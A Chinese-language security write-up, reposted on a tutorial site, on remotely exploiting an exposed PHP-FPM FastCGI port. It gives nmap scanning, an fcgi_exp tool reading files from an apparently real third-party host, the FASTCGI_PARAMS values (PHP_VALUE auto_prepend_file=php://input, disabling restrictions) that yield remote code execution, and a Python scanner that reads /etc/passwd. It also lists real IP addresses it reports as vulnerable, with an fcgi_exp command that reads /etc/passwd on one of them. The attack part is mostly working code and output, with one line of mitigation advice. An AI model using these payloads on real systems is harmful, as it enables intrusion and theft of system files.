PHP FastCGI的远程利用

说到FastCGI，大家都知道这是目前最常见的webserver动态脚本执行模型之一。目前基本所有web脚本都基本支持这种模式，甚至有的类型脚本这是唯一的模式（ROR，Python等）。

FastCGI的主要目的就是，将webserver和动态语言的执行分开为两个不同的常驻进程，当webserver接收到动态脚本的请求，就通过fcgi协议将请求通过网络转发给fcgi进程，由fcgi进程进行处理之后，再将结果传送给webserver，然后webserver再输出给浏览器。这种模型由于不用每次请求都重新启动一次cgi，也不用嵌入脚本解析器到webserver中去，因此可伸缩性很强，一旦动态脚本请求量增加，就可以将后端fcgi进程单独设立一个集群提供服务，很大的增加了可维护性，这也是为什么fcgi等类似模式如此流行的原因之一。

然而正是因为这种模式，却也带来了一些问题。例如去年80sec发布的《nginx文件解析漏洞》 实际上就是由于fcgi和webserver对script路径级参数的理解不同出现的问题。除此之外，由于fcgi和webserver是通过网络进行沟通的，因此目前越来越多的集群将fcgi直接绑定在公网上，所有人都可以对其进行访问。这样就意味着，任何人都可以伪装成webserver，让fcgi执行我们想执行的脚本内容。

ok，以上就是背景原理解释，我这里就用我最熟悉的PHP给各位做个例子。

php的fastcgi目前通常叫做FPM。他默认监听的端口是9000端口。我们这里用nmap直接扫描一下：

nmap -sV -p 9000 --open x.x.x.x/24

为什么要用sV？因为9000端口可能还存在其他服务，这里需要借用nmap的指纹识别先帮我们鉴定一下。

[root@test:~/work/fcgi]#nmap -sV -p 9000 --open 173.xxx.xxx.1/24

Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDT
Nmap scan report for abc.net (173.xxx.xxx.111)
Host is up (0.0095s latency).
PORT     STATE SERVICE VERSION
9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Nmap scan report for abc.com (173.xxx.xxx.183)
Host is up (0.0096s latency).
PORT     STATE SERVICE    VERSION
9000/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (198 hosts up) scanned in 7.70 seconds

随便扫描了一下，运气不错，一个C段有2个开放9000端口的，不过其中一个是被管理员修改的sshd，另一个tcpwrapped，才是我们的目标。

为了做测试，我写了一个fastcgi的客户端程序，直接向对方发起请求。我们利用一个开放的fastcgi能有什么作用？这里和普通的http请求有一点不同，因为webserver为了提供fastcgi一些参数，每次转发请求的时候，会通过FASTCGI_PARAMS的包向fcgi进程进行传递。本来这些参数是用户不可控的，但是既然这个fcgi对外开放，那么也就说明我们可以通过设定这些参数，来让我们去做一些原本做不到的事情：

[root@test:~/work/fcgi]#./fcgi_exp read 173.xxx.xxx.183 9000 /etc/issue

X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-type: text/html www.

Ubuntu 10.04.3 LTS \n \l

读到了/etc/issue文件，可以看到这是台ubuntu 10.04的机器。那又是怎么实现的呢？其实我们只要在FASTCGI_PARAMS中，设定 DOCUMENT_ROOT为"/"根目录即可，随后再设置SCRIPT_FILENAME为/etc/issue。这样，只要我们有权限，我们就可以控制fcgi去读取这台机器上的任意文件了。实际上这并不是读取，而是用php去执行它。

既然是执行，所以其实这个漏洞就类似于一个普通的LFI漏洞，如果你知道这台机器上的log路径，或者任何你可以控制内容的文件路径，你就可以执行任意代码了。

到此为止了么？不，如果利用log或者去猜其他文件路径去执行代码，还是不够方便，有没有更为方便的利用方式可以让我执行任意我提交的代码呢？

这里我也找了很多办法，最先想到的是传递env参数过去然后去执行/proc/self/environ文件，可惜php-fpm在接收到我的参数值后只是在内存中修改了环境变量，并不会直接改动这个文件。因此没法利用。况且这个方式也不是所有系统都通用。

我们还有一种方法，在我之前写的《CVE-2012-1823（PHP-CGI RCE）的PoC及技术挑战》中，可以通过动态修改php.ini中的auto_prepend_file的值，去远程执行任意文件。将一个LFI的漏洞变成了RFI，这样可利用空间就大大增加。

fastcgi是否也支持类似的动态修改php的配置？我查了一下资料，发现原本FPM是不支持的，直到某开发者提交了一个bug，php官方才将此特性Merge到php 5.3.3的源码中去。

通用通过设置FASTCGI_PARAMS，我们可以利用PHP_ADMIN_VALUE和PHP_VALUE去动态修改php的设置。

env["REQUEST_METHOD"] = "POST"
env["PHP_VALUE"] = "auto_prepend_file = php://input"
env["PHP_ADMIN_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"

利用执行php://input，然后在POST的内容中写入我们的php代码，这样就可以直接执行了。

[root@test:~/work/fcgi]#./fcgi_exp system 127.0.0.1 9000 /tmp/a.php "id; uname -a"   

X-Powered-By: PHP/5.5.0-dev
Content-type: text/html

uid=500(www) gid=500(www) groups=500(www)
Linux test 2.6.18-308.13.1.el5 #1 SMP Tue Aug 21 17:51:21 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux

细心者会注意到这里有些变化，我换了本机做测试。因为开始发现的那台机器php版本是5.3.2，正好低于5.3.3，因此无法利用修改ini设置去执行代码，只能去猜路径。

另一个变化是，我这里去读取/tmp/a.php这个php文件，而不是去读取/etc/issue。因为在5.3.9开始，php官方加入了一个配置"security.limit_extensions"，默认状态下只允许执行扩展名为".php"的文件。因此你必须找到一个已经存在的php文件。而这个设置是php-fpm.conf里的，无法通过修改ini的配置去覆盖它。如果谁能有更好的办法可以绕过这个限制，请告诉我。

ok，目前为止对php-fpm的所有测试已经结束，我们利用一个对外开放的fcgi进程，已经可以直接获取shell了。各位不如也去研究一下其他fcgi，或许会有更多发现。

如何防止这个漏洞？很简单，千万不要把fcgi接口对公网暴露。同时也希望将来fcgi会有身份认证机制。

任何系统上编译，请安装golang之后，执行：
go build fcgi_exp.go

fastcgi文件读取漏洞python扫描脚本

fastcgi文件读取（代码执行）是个很老的漏洞，漏洞描述： PHP FastCGI 的远程利用

利用该漏洞可读取系统文件，甚至有一定几率成功执行代码。 下载上述文章中提到的： fcgi_exp

协议细节其实我已不关心，只需要一个python的扫描脚本。于是拿wireshark抓了下GaRY的程序，写一小段代码。

外网暴露9000端口的机器自然是非常非常少的，但内网可就说不定了。

import socket
import sys

def test_fastcgi(ip):
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
  sock.connect((ip, 9000))
  data = """
  01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
  01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 
  54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 
  56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 
  2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
  4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
  52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 
  50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 
  70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
  4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
  63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
  """
  data_s = ''
  for _ in data.split():
    data_s += chr(int(_,16))
  sock.send(data_s)
  try:
    ret = sock.recv(1024)
    if ret.find(':root:') > 0:
      print ret
      print '%s is vulnerable!' % ip
      return True
    else:
      return False
  except Exception, e:
    pass
      
  sock.close()


if __name__ == '__main__':
  if len(sys.argv) == 1:
    print sys.argv[0], '[ip]'
  else:
    test_fastcgi(sys.argv[1])

通过快速扫描9000端口，可以发现几个存在漏洞的机器：

110.164.68.137 is vul !
110.164.68.148 is vul !
110.164.68.149 is vul !
110.164.68.151 is vul !
110.164.68.154 is vul !
110.164.68.155 is vul !

fcgi_exp.exe read 110.164.68.137 9000 /etc/passwd

# fastcgi  # 文件读取漏洞  # 使用PYTHON解析Wireshark的PCAP文件方法  # 这是  # 会有  # 就可以  # 中去  # 对外开放  # 这台  # 的是  # 我也  # 几个  # 是个  # 让我  # 在我  # 告诉我  # 你可以  # 大家都  # 让我们  # 也就  # 才是  # 是怎么  # 你知道 

相关栏目： 【 网站优化151355 】 【 网络推广146373 】 【 网络技术251813 】 【 AI营销90571 】

相关推荐： 如何自己制作一个网站链接,如何制作一个企业网站，建设网站的基本步骤有哪些？  PHP 500报错的快速解决方法  制作企业网站建设方案,怎样建设一个公司网站？  Laravel如何集成微信支付SDK_Laravel使用yansongda-pay实现扫码支付【实战】  如何快速搭建高效WAP手机网站？  详解vue.js组件化开发实践  Laravel如何使用Livewire构建动态组件？（入门代码）  家族网站制作贴纸教程视频,用豆子做粘帖画怎么制作？  如何挑选高效建站主机与优质域名？  Edge浏览器提示“由你的组织管理”怎么解决_去除浏览器托管提示【修复】  动图在线制作网站有哪些,滑动动图图集怎么做？  Windows Hello人脸识别突然无法使用  消息称 OpenAI 正研发的神秘硬件设备或为智能笔，富士康代工  北京企业网站设计制作公司,北京铁路集团官方网站？  成都网站制作公司哪家好,四川省职工服务网是做什么用？  Laravel如何实现本地化和多语言支持？（i18n教程）  香港网站服务器数量如何影响SEO优化效果？  如何有效防御Web建站篡改攻击？  Laravel Octane如何提升性能_使用Laravel Octane加速你的应用  nodejs redis 发布订阅机制封装实现方法及实例代码  如何用AI帮你把自己的生活经历写成一个有趣的故事？  如何在建站之星网店版论坛获取技术支持？  Bootstrap CSS布局之列表  千问怎样用提示词获取健康建议_千问健康类提示词注意事项【指南】  如何在IIS中新建站点并解决端口绑定冲突？  如何用手机制作网站和网页,手机移动端的网站能制作成中英双语的吗？  原生JS实现图片轮播切换效果  如何在香港免费服务器上快速搭建网站？  韩国代理服务器如何选？解析IP设置技巧与跨境访问优化指南  学生网站制作软件,一个12岁的学生写小说，应该去什么样的网站？  EditPlus中的正则表达式 实战(1)  Laravel如何使用Spatie Media Library_Laravel图片上传管理与缩略图生成【步骤】  iOS正则表达式验证手机号、邮箱、身份证号等  5种Android数据存储方式汇总  制作公司内部网站有哪些,内网如何建网站？  Win11摄像头无法使用怎么办_Win11相机隐私权限开启教程【详解】  Laravel如何操作JSON类型的数据库字段？（Eloquent示例）  轻松掌握MySQL函数中的last_insert_id()  C++用Dijkstra(迪杰斯特拉)算法求最短路径  logo在线制作免费网站在线制作好吗,DW网页制作时，如何在网页标题前加上logo？  如何利用DOS批处理实现定时关机操作详解  如何用PHP快速搭建CMS系统？  详解jQuery中的事件  微信h5制作网站有哪些,免费微信H5页面制作工具？  如何基于云服务器快速搭建网站及云盘系统？  JavaScript如何实现继承_有哪些常用方法  微信小程序 input输入框控件详解及实例（多种示例）  Laravel Blade模板引擎语法_Laravel Blade布局继承用法  敲碗10年！Mac系列传将迎来「触控与联网」双革新  如何快速搭建支持数据库操作的智能建站平台？